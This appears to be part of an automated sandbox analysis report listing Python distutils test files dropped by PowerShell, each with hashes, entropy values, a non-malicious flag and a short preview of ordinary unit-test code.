                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19643
                                                                                                                                                                                                            Entropy (8bit):4.536606470406793
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:+zcQDI90jPIggo+ilIuiQgydpb5odPnwEwCpPSPgfPwevH+Yd:+zcQDIggggoXlIui0pCn5jNseTd
                                                                                                                                                                                                            MD5:DB67454DED31DD4A42BF396D2D2190A9
                                                                                                                                                                                                            SHA1:5E5A7BBCB9BFC08FB90439611E370BD5FAD2E3C5
                                                                                                                                                                                                            SHA-256:713F14738F28AB99461BAE5DDA4F07BD72BD29E9E3C680D75979FC9568706AC7
                                                                                                                                                                                                            SHA-512:DFABF0836CE464FDBFE8D149D04F4074D97A9C4FB2CA6A6B1499F6D52050B3095C6CA593A02202C3F5598CFF37E230BD2CE185FC06803DD62C27088B231CDD8C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.dist."""..import os..import io..import sys..import unittest..import warnings..import textwrap....from unittest import mock....from distutils.dist import Distribution, fix_help_options..from distutils.cmd import Command....from test.support import (.. captured_stdout, captured_stderr, run_unittest..)..from test.support.os_helper import TESTFN..from distutils.tests import support..from distutils import log......class test_dist(Command):.. """Sample distutils extension command.""".... user_options = [.. ("sample-option=", "S", "help text"),.. ].... def initialize_options(self):.. self.sample_option = None......class TestDistribution(Distribution):.. """Distribution subclasses that avoids the default search for.. configuration files..... The ._config_files attribute must be set before.. .parse_config_files() is called... """.... def find_config_files(self):.. return self._config_files......class DistributionTestC
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2878
                                                                                                                                                                                                            Entropy (8bit):4.500948417833239
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:O31rArl+M9rZzUqNmkCawEnS0krN+4s6lsmFRo562I:irArcezUzbJEnVkrfs6lsyu56Z
                                                                                                                                                                                                            MD5:695D9DEBE8CCBC662BBE085107F1D1FB
                                                                                                                                                                                                            SHA1:A4C2CFD291C1DF47E29108C639390C12BB43D066
                                                                                                                                                                                                            SHA-256:E7769C4CE8434FD4454DE3C371ACE5BF09377D10664D19A958C6DB15A82769F4
                                                                                                                                                                                                            SHA-512:8C8FE1A8D5AC8E354CD3611785D96BDF1FD477B859A6F4F0FB6AA371A4D90B424D69E64A10EDA632CCE107E0B295650A090370B8E8122394D30B915DFEC779C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.extension."""..import unittest..import os..import warnings....from test.support import run_unittest..from test.support.warnings_helper import check_warnings..from distutils.extension import read_setup_file, Extension....class ExtensionTestCase(unittest.TestCase):.... def test_read_setup_file(self):.. # trying to read a Setup file.. # (sample extracted from the PyGame project).. setup = os.path.join(os.path.dirname(__file__), 'Setup.sample').... exts = read_setup_file(setup).. names = [ext.name for ext in exts].. names.sort().... # here are the extensions read_setup_file should have created.. # out of the file.. wanted = ['_arraysurfarray', '_camera', '_numericsndarray',.. '_numericsurfarray', 'base', 'bufferproxy', 'cdrom',.. 'color', 'constants', 'display', 'draw', 'event',.. 'fastevent', 'font', 'gfxdraw', 'image', 'imageext',..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4572
                                                                                                                                                                                                            Entropy (8bit):4.555050608780429
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OIAAMIZaMAUMNrArcMs9HlsT6fhSDlKs+dcvzC1cvCFZxi516H5Rn0n7PvZRN0ny:gA3aSwrAreq6MrwGe5RnARmnT45VZ
                                                                                                                                                                                                            MD5:45781A34C9B6FC7D82144493FF5DFD4F
                                                                                                                                                                                                            SHA1:3422D7397FEC81651DCEB210C87BCD45C2A7B142
                                                                                                                                                                                                            SHA-256:0E9C8298AD76A6FCBE1791A57D7C2FA7A4B0169B7C9E2643932419D1F518BCA3
                                                                                                                                                                                                            SHA-512:98DADC6D2929F26C90B7BC1600A5768CC3223DDF5953D4F8B072238332B1A6CE83DD3301EEFAAC99B6619626FC9272F72C0EA3F620D92BD96A4BE3A1A4833F38
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.file_util."""..import unittest..import os..import errno..from unittest.mock import patch....from distutils.file_util import move_file, copy_file..from distutils import log..from distutils.tests import support..from distutils.errors import DistutilsFileError..from test.support import run_unittest..from test.support.os_helper import unlink......class FileUtilTestCase(support.TempdirManager, unittest.TestCase):.... def _log(self, msg, *args):.. if len(args) > 0:.. self._logs.append(msg % args).. else:.. self._logs.append(msg).... def setUp(self):.. super(FileUtilTestCase, self).setUp().. self._logs = [].. self.old_log = log.info.. log.info = self._log.. tmp_dir = self.mkdtemp().. self.source = os.path.join(tmp_dir, 'f1').. self.target = os.path.join(tmp_dir, 'f2').. self.target_dir = os.path.join(tmp_dir, 'd1').... def tearDown(self):.. log.info = self.old_log
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11809
                                                                                                                                                                                                            Entropy (8bit):4.508811156659698
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:oBE8tdTNUIHVro2Ok5EVUEBH1reUA1k/NViX446lq+op6NoKLpEISIS08eSqBZ:oB/XxvQsoXqzpjK9XSIS08eS2
                                                                                                                                                                                                            MD5:71E30B242459A097A0FE5486C732BFD2
                                                                                                                                                                                                            SHA1:8B5D40B08CE7C64C98AA976226B8DCA23C2E5F5F
                                                                                                                                                                                                            SHA-256:3F5F67EA85A98029EC1E5E7F90D856FF7FC2A9C98B350CAA89F61A9DA30009F1
                                                                                                                                                                                                            SHA-512:59A51C852795B7582EB2C8055EE5E2B100542035BFF6D75C7693CF88328E298F6072BA527488F067C5232F1637C6E2285BAE1F12B267BEB92F38935AF4F32558
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.filelist."""..import os..import re..import unittest..from distutils import debug..from distutils.log import WARN..from distutils.errors import DistutilsTemplateError..from distutils.filelist import glob_to_re, translate_pattern, FileList..from distutils import filelist....from test.support import os_helper..from test.support import captured_stdout, run_unittest..from distutils.tests import support....MANIFEST_IN = """\..include ok..include xo..exclude xo..include foo.tmp..include buildout.cfg..global-include *.x..global-include *.txt..global-exclude *.tmp..recursive-include f *.oo..recursive-exclude global *.x..graft dir..prune dir3.."""......def make_local_path(s):.. """Converts '/' in a string to os.sep""".. return s.replace('/', os.sep)......class FileListTestCase(support.LoggingSilencer,.. unittest.TestCase):.... def assertNoWarnings(self):.. self.assertEqual(self.get_logs(WARN), []).. self.clear_logs().... def
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9244
                                                                                                                                                                                                            Entropy (8bit):4.625730768202393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NLl/n/c80yeUgagpmpcm3sb9bIlbT+Gv2bTV//NQUZ:NLl//crm31T+TV9R
                                                                                                                                                                                                            MD5:FB82E27D738DA83652728C0AEE88C1F4
                                                                                                                                                                                                            SHA1:8AB98A1261F1346C0705798F86E980A7724CE01D
                                                                                                                                                                                                            SHA-256:3DAAE65CF39B15C5D51C4C78AAB091EE5746945DACCC5BC13A37F0CA66129858
                                                                                                                                                                                                            SHA-512:3937D8EAB5099A1AEC283E517C5F59600D4BE1A576C5946B955775A180CC84EF2A2E26CDBB3F2AB0F00063AD8736DE629A9D3E4986F61E6366F83449A24526D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.install."""....import os..import sys..import unittest..import site....from test.support import captured_stdout, run_unittest....from distutils import sysconfig..from distutils.command.install import install, HAS_USER_SITE..from distutils.command import install as install_module..from distutils.command.build_ext import build_ext..from distutils.command.install import INSTALL_SCHEMES..from distutils.core import Distribution..from distutils.errors import DistutilsOptionError..from distutils.extension import Extension....from distutils.tests import support..from test import support as test_support......def _make_ext_name(modname):.. return modname + sysconfig.get_config_var('EXT_SUFFIX')......class InstallTestCase(support.TempdirManager,.. support.EnvironGuard,.. support.LoggingSilencer,.. unittest.TestCase):.... def setUp(self):.. super().setUp().. self._backup_config_vars = d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2652
                                                                                                                                                                                                            Entropy (8bit):4.498103196778886
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OcMAMAUraO+I4LVxPYi7SNBNPUY57iowopKN7gAU582I:HpSr14LDBmrMqDsDU58Z
                                                                                                                                                                                                            MD5:9855671ED0170514D7CBC91C36B83907
                                                                                                                                                                                                            SHA1:C42DBE1EC8AEED56C42A62AEADD41F4AEB144C19
                                                                                                                                                                                                            SHA-256:63227C1AB5499D834FDFBB3EC2D646CA38F95A78B83EF31E4A29E9063457EE3F
                                                                                                                                                                                                            SHA-512:206A207F0DC4D543227D5FBF25009D0C906061B9BA3B383171804DBF936617EB2F81710C50C113AD4F03551213EB19571EAB63E8B5D52C58A25C3A95E988A64E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.install_data."""..import os..import unittest....from distutils.command.install_data import install_data..from distutils.tests import support..from test.support import run_unittest....class InstallDataTestCase(support.TempdirManager,.. support.LoggingSilencer,.. support.EnvironGuard,.. unittest.TestCase):.... def test_simple_run(self):.. pkg_dir, dist = self.create_dist().. cmd = install_data(dist).. cmd.install_dir = inst = os.path.join(pkg_dir, 'inst').... # data_files can contain.. # - simple files.. # - a tuple with a path, and a list of file.. one = os.path.join(pkg_dir, 'one').. self.write_file(one, 'xxx').. inst2 = os.path.join(pkg_dir, 'inst2').. two = os.path.join(pkg_dir, 'two').. self.write_file(two, 'xxx').... cmd.data_files = [one, (inst2, [two])].. self.assertEqual(cmd.get_i
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1277
                                                                                                                                                                                                            Entropy (8bit):4.458025556514821
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:BMCnMiManMAUrUF7Jmqb35ANai93HEI79QGT5X1KpYI:OCMvaMAUrg3XO3N7Z5E2I
                                                                                                                                                                                                            MD5:1E80F50090C057E4CACCDA699AC0EE8E
                                                                                                                                                                                                            SHA1:67DAD7D12284677853E1F5DAF52FD6692F996D52
                                                                                                                                                                                                            SHA-256:451F0079D14B75E434401DDE5161AD6A87FCE7821A4F7906F2E88906936A93D7
                                                                                                                                                                                                            SHA-512:C814C48E9E4FF2F461550B17B323A7CC6172F9AC5022B805134D9861F02D142621F072D11700D12F2E992BAEA118BED2BEB71B8D66A70A6B702BA783AB6FE61D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.install_headers."""..import os..import unittest....from distutils.command.install_headers import install_headers..from distutils.tests import support..from test.support import run_unittest....class InstallHeadersTestCase(support.TempdirManager,.. support.LoggingSilencer,.. support.EnvironGuard,.. unittest.TestCase):.... def test_simple_run(self):.. # we have two headers.. header_list = self.mkdtemp().. header1 = os.path.join(header_list, 'header1').. header2 = os.path.join(header_list, 'header2').. self.write_file(header1).. self.write_file(header2).. headers = [header1, header2].... pkg_dir, dist = self.create_dist(headers=headers).. cmd = install_headers(dist).. self.assertEqual(cmd.get_inputs(), headers).... # let's run the command.. cmd.install_dir = os.path.join(pkg_dir, 'inst')..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4089
                                                                                                                                                                                                            Entropy (8bit):4.562501588534488
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OWKMELMZMAUMcrpOERgRW0Nac2dOnQ0IOnsPUFf1m4JOnsPUFfqmV8OEnt/D3X/h:BKd8SdrRR+WcaMFf1mXFfqmVut/T/5tZ
                                                                                                                                                                                                            MD5:51F5F63C8A15F5E715AF83C67BDF7CDF
                                                                                                                                                                                                            SHA1:7FE250AB61071572E8D53B18ABEC734BCC84DE3D
                                                                                                                                                                                                            SHA-256:6B813555CA3AB4FD6F6957847DD1702DC9DCBB81AAFF5138F6A79495AE42074F
                                                                                                                                                                                                            SHA-512:91EE78D73C556ABABEFDD6C12BB5E3B8C9FEA2197BC3614D251B5C3ED70487868A2A706F4159344221102262601E86976240C13EA719D56CE12A101103E706AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.install_data."""..import sys..import os..import importlib.util..import unittest....from distutils.command.install_lib import install_lib..from distutils.extension import Extension..from distutils.tests import support..from distutils.errors import DistutilsOptionError..from test.support import run_unittest......class InstallLibTestCase(support.TempdirManager,.. support.LoggingSilencer,.. support.EnvironGuard,.. unittest.TestCase):.... def test_finalize_options(self):.. dist = self.create_dist()[1].. cmd = install_lib(dist).... cmd.finalize_options().. self.assertEqual(cmd.compile, 1).. self.assertEqual(cmd.optimize, 0).... # optimize must be 0, 1, or 2.. cmd.optimize = 'foo'.. self.assertRaises(DistutilsOptionError, cmd.finalize_options).. cmd.optimize = '4'.. self.assertRaises(DistutilsOptionError, cmd.finalize_o
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2707
                                                                                                                                                                                                            Entropy (8bit):4.361732224196391
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ObMyMDMAUrDLyVJRAdZ7LIup5fC5BPYimaRI5y2I:GLySrDLOCAe565BPVmJ5yZ
                                                                                                                                                                                                            MD5:5B5A3E16770A42066D2D1D7A26C002AB
                                                                                                                                                                                                            SHA1:D1F07A2E0F1FFBA6A5A7D76FCED37CA4C36DA6C9
                                                                                                                                                                                                            SHA-256:7B829F41B9D77B43D7E75F58CF5BBBD3DF16AE133DF537A94E5A4DDD3AA3DBA8
                                                                                                                                                                                                            SHA-512:25DA5D2C0D53797011766EC194AE46FC203CFAF31A377A45EDDBD5AF3EC8483569991EC44BAF29CC1EC1B125D1F07294930B55BC06A0A3C7056E526CB5987137
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.install_scripts."""....import os..import unittest....from distutils.command.install_scripts import install_scripts..from distutils.core import Distribution....from distutils.tests import support..from test.support import run_unittest......class InstallScriptsTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... def test_default_settings(self):.. dist = Distribution().. dist.command_obj["build"] = support.DummyCommand(.. build_scripts="/foo/bar").. dist.command_obj["install"] = support.DummyCommand(.. install_scripts="/splat/funk",.. force=1,.. skip_build=1,.. ).. cmd = install_scripts(dist).. self.assertFalse(cmd.force).. self.assertFalse(cmd.skip_build).. self.assertIsNone(cmd.build_dir).. self.assertIsNone(cmd.install_dir).... cmd.finalize_options(
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1910
                                                                                                                                                                                                            Entropy (8bit):4.287143981294994
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:BMK1rGny4rFLJYdQ9ZpPmY9O+DSFxESFgJwk4QO775Q8U2pcwNGpefsrpcG20GGH:OK1rGy4JoQvQB+m7gJW75Qbq1bK5t2I
                                                                                                                                                                                                            MD5:5A9302F2604DF75F623C027CEA7DE44A
                                                                                                                                                                                                            SHA1:9ECBB18794B9AB6D36CF90CC101C5F205D0642D3
                                                                                                                                                                                                            SHA-256:90E6BC0FD33CF93C8DC46461B538B9EFA17572E0CEA1C4A0B34D36BBC027E33E
                                                                                                                                                                                                            SHA-512:EB4E9EC1EDC6F78775CA6D4CF8CFB8E4784570F33B94CF3ACEB792197B8C824313491021F458A16FFFC64643CD1C22E9AC357426B4844E23CFA52948F29D3545
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.log"""....import io..import sys..import unittest..from test.support import swap_attr, run_unittest....from distutils import log....class TestLog(unittest.TestCase):.. def test_non_ascii(self):.. # Issues #8663, #34421: test that non-encodable text is escaped with.. # backslashreplace error handler and encodable non-ASCII text is.. # output as is... for errors in ('strict', 'backslashreplace', 'surrogateescape',.. 'replace', 'ignore'):.. with self.subTest(errors=errors):.. stdout = io.TextIOWrapper(io.BytesIO(),.. encoding='cp437', errors=errors).. stderr = io.TextIOWrapper(io.BytesIO(),.. encoding='cp437', errors=errors).. old_threshold = log.set_threshold(log.DEBUG).. try:.. with swap_attr(sys, 'stdout', stdout), \..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6222
                                                                                                                                                                                                            Entropy (8bit):4.994919924093367
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HWHSrqnHRutTRKRutUtXREtCR6TfA1P3l3rhwmt851eZ:HzBfAl3bwD1eZ
                                                                                                                                                                                                            MD5:02A728B47643FCD58CD7D1C68C4124A9
                                                                                                                                                                                                            SHA1:C8095884E4737D50E815597D03A83D8307773695
                                                                                                                                                                                                            SHA-256:3A87AC1D4D8D2FC8BFFECCA97E740573A9AA142DAA700D76F2A72D577F963999
                                                                                                                                                                                                            SHA-512:39F0388544A42E295A22B19A47633254D06FD5257A512989372D3DDC19719710180FEEBC4B78FD8AEE708D0FA41A64719703A8FCA339B2FCAC8717935B7BFC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.msvc9compiler."""..import sys..import unittest..import os....from distutils.errors import DistutilsPlatformError..from distutils.tests import support..from test.support import run_unittest....# A manifest with the only assembly reference being the msvcrt assembly, so..# should have the assembly completely stripped. Note that although the..# assembly has a <security> reference the assembly is removed - that is..# currently a "feature", not a bug :).._MANIFEST_WITH_ONLY_MSVC_REFERENCE = """\..<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1".. manifestVersion="1.0">.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false">.. </requestedExecutionLevel>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity ty
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2926
                                                                                                                                                                                                            Entropy (8bit):4.645762862019019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:OuWMSMAUr0lQqzo7COSMzlr8d8I5qKeKcJzNoC3d7Q/zsC3rKH51L2I:bWHSr0lQeor8d8IzyoydJyrs51LZ
                                                                                                                                                                                                            MD5:60AD1C22DA6FC11F4D36BE9AC5C75FA8
                                                                                                                                                                                                            SHA1:FAE107FA21BF7B3C7DE6551A9DE5F5FC1BAEF78E
                                                                                                                                                                                                            SHA-256:F09BBAAE6A72C0E2754F2DF60D89B6C4F58E84C41272F388F129526640E265CC
                                                                                                                                                                                                            SHA-512:79F957FE84ED36782188BEE25B264EF4DC87CD0C62F505101B77B4A8447FCA81013C81960504DB25AA79370B0B834AB3ACA9B7F56B081FBE0463B56D8636336E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils._msvccompiler."""..import sys..import unittest..import os....from distutils.errors import DistutilsPlatformError..from distutils.tests import support..from test.support import run_unittest......SKIP_MESSAGE = (None if sys.platform == "win32" else.. "These tests are only for win32")....@unittest.skipUnless(SKIP_MESSAGE is None, SKIP_MESSAGE)..class msvccompilerTestCase(support.TempdirManager,.. unittest.TestCase):.... def test_no_compiler(self):.. import distutils._msvccompiler as _msvccompiler.. # makes sure query_vcvarsall raises.. # a DistutilsPlatformError if the compiler.. # is not found.. def _find_vcvarsall(plat_spec):.. return None, None.... old_find_vcvarsall = _msvccompiler._find_vcvarsall.. _msvccompiler._find_vcvarsall = _find_vcvarsall.. try:.. self.assertRaises(DistutilsPlatformError,.. _msvccompiler.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10129
                                                                                                                                                                                                            Entropy (8bit):4.566906534978148
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WfqhUGBKm/D1T6by/kgRBK5WKfd2odnN4SSVIydgNdgYucd3MLvkgBEMbooYso/W:uqs9b59vSX0icdRy
                                                                                                                                                                                                            MD5:F807C016E7954E12A3DE77388EB25C14
                                                                                                                                                                                                            SHA1:8CFBD65A5F4DEC5AE2BC942B136AE794A2BD94AE
                                                                                                                                                                                                            SHA-256:C48732EE8EF65DEF85AF5A6F7128A17B4D4EB4372C25AB337F47E99324667C87
                                                                                                                                                                                                            SHA-512:F5B2FA0B38539B2206044CB45CE888447E32276DAF9DE2BE557069716DDC707C5B92396A4C4495EACB3C78FBB562D7838244C7DD2424E7DA2798BAAC675CBE96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.register."""..import os..import unittest..import getpass..import urllib..import warnings....from test.support import run_unittest..from test.support.warnings_helper import check_warnings....from distutils.command import register as register_module..from distutils.command.register import register..from distutils.errors import DistutilsSetupError..from distutils.log import INFO....from distutils.tests.test_config import BasePyPIRCCommandTestCase....try:.. import docutils..except ImportError:.. docutils = None....PYPIRC_NOPASSWORD = """\..[distutils]....index-servers =.. server1....[server1]..username:me.."""....WANTED_PYPIRC = """\..[distutils]..index-servers =.. pypi....[pypi]..username:tarek..password:password.."""....class Inputs(object):.. """Fakes user inputs.""".. def __init__(self, *answers):.. self.answers = answers.. self.index = 0.... def __call__(self, prompt=''):.. try:.. return self.answers[s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17580
                                                                                                                                                                                                            Entropy (8bit):4.668499443540114
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:S0b0RTbqW/YX+x+39u4saczzOpN12Di63vF:S0b4uWVI3w4vczzOpN12D53d
                                                                                                                                                                                                            MD5:48DBE6D372BC3ADD464B40D60C30F652
                                                                                                                                                                                                            SHA1:EE65205F676DA7A9E697820D580FAFA36765F042
                                                                                                                                                                                                            SHA-256:80A89BE547ADA607272082870879E2B997355B2816572C326576A7F87597F45D
                                                                                                                                                                                                            SHA-512:8CE120D79A4A575883FEEE05E5A8BBF2D74FC385C0FAF78CA9CACE325F7F4DBFE2A40D9583EC2B256D17B4EA8640F5E651C3549F66C2FFB713B6B189285043B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.command.sdist."""..import os..import tarfile..import unittest..import warnings..import zipfile..from os.path import join..from textwrap import dedent..from test.support import captured_stdout, run_unittest..from test.support.warnings_helper import check_warnings....try:.. import zlib.. ZLIB_SUPPORT = True..except ImportError:.. ZLIB_SUPPORT = False....try:.. import grp.. import pwd.. UID_GID_SUPPORT = True..except ImportError:.. UID_GID_SUPPORT = False....from distutils.command.sdist import sdist, show_formats..from distutils.core import Distribution..from distutils.tests.test_config import BasePyPIRCCommandTestCase..from distutils.errors import DistutilsOptionError..from distutils.spawn import find_executable..from distutils.log import WARN..from distutils.filelist import FileList..from distutils.archive_util import ARCHIVE_FORMATS....SETUP_PY = """..from distutils.core import setup..import somecode....setup(name='fake').."""....MANIFEST = "
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5567
                                                                                                                                                                                                            Entropy (8bit):4.286018052418185
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:wcVrkSrsNnUVxS7TPQm4Hc4hQm4Kc41NVfzMm0rwmd0vmqg+U8hrhNj5gZ:wc1kwsn7Tc/TSm+wm8mU1ZgZ
                                                                                                                                                                                                            MD5:E774A2AA9C175F830EDEF2BD52B69632
                                                                                                                                                                                                            SHA1:CE7BE058F02A850F3F72E1237DD653D600CE55CE
                                                                                                                                                                                                            SHA-256:2F946943C004D46F67965A2CB37ED5C275320698DF57F9CD0268960D8EE7C9DC
                                                                                                                                                                                                            SHA-512:8C6BC6110F02146E530E0A88E07927D0E3CDB0D4940B8362997A22D91F6A8B9002B2F7F4F6B1E835F8C1CA7CDCA9516AC937DBBE654DE3BC6B1620B1C81F3B17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Tests for distutils.spawn."""..import os..import stat..import sys..import unittest.mock..from test.support import run_unittest, unix_shell..from test.support import os_helper....from distutils.spawn import find_executable..from distutils.spawn import spawn..from distutils.errors import DistutilsExecError..from distutils.tests import support....class SpawnTestCase(support.TempdirManager,.. support.LoggingSilencer,.. unittest.TestCase):.... @unittest.skipUnless(os.name in ('nt', 'posix'),.. 'Runs only under posix or nt').. def test_spawn(self):.. tmpdir = self.mkdtemp().... # creating something executable.. # through the shell that returns 1.. if sys.platform != 'win32':.. exe = os.path.join(tmpdir, 'foo.sh').. self.write_file(exe, '#!%s\nexit 1' % unix_shell).. else:.. exe = os.path.join(tmpdir, 'foo.bat').. self.write_file(exe, 'exit 1').
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11397
                                                                                                                                                                                                            Entropy (8bit):4.705184644922009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1B/8WeSrRrVrfqJ1Pt0ZxnDlR3/X+nDFQCvntkMNKjSEaIrvzv2rvf81pkQMWkiP:1Bt51SqDPZwkEfviFJx9D3B1/
                                                                                                                                                                                                            MD5:5F255412B83914D4F8E934E76DCDAF8E
                                                                                                                                                                                                            SHA1:C98A8778D001029C05147268ADE687DE71CC1650
                                                                                                                                                                                                            SHA-256:CB84143E55025BF39E7DBB869582C99FE09E335C42422D46E52DDFB117DC6EE8
                                                                                                                                                                                                            SHA-512:4D5EF01FEC703E5529D16E30B3C9A670B4E8C25AF24E6E57143290645F88E3AA379E8053B8042E294E37C296DB51B212F9EA08D6CE0CC242232EF52FB56610FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
